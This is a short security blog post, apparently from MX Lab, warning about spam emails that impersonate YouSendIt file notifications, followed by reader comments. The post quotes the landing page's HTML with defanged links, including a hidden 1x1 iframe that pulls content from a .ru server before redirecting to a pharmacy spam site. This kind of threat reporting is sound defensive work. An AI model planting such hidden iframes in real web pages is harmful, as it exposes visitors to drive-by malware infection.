YouSendIt abused in a malware and spam distribution
August 5, 2010 3 Comments
MX Lab intercepted a emails with the subject “You have received a file from aleppotz@rockypointinc.com via YouSendIt.” that contains a potential risk of a malicious payload and redirects you to a Canadian Pharmacy web site. The email address in the subject line can be different depending on the spoofed senders address.
The message indicates that you have a file, in this case an audio file in MP4 format, for you to download at YouSendIt, the well known online file sharing and distribution web site.
The URLs in the message however, do not point to the YouSendIt web site but will lead to hxxp://carlaustiniii.org/x.html. When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.
The web site has the following HTML code:
PLEASE WAITING 4 SECOND... <meta http-equiv="refresh" content="4;url=hxxp://spruceteam.com"> </head><body> <iframe src="hxxp://tartonion.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe> </body></html>
We believe that at this stage that these messages have a malicious payload that could infect your computer. Afterwards we got redirected to hxxp://spruceteam.com/, the famous Canadian Pharmacy web site.
MX Lab has detected an increase in combined strategies during the last few weeks and months where emails leads to a web site with malicious code and exploits and then forward the user to a spam web site in the hope that the end user will not note that his computer is also infected with a trojan.
Pingback: Messages with the YouSendIt Reader contains the Bredolab trojan « mxlab – all about anti virus and anti spam
I have been receiving several of these a day. I obviously delete them but man their ruthless! Mine contain a zip file versus mp file…
I’ve been swamped with these for the past two days. What a bad intro to YouSendit, which looks like a very good service.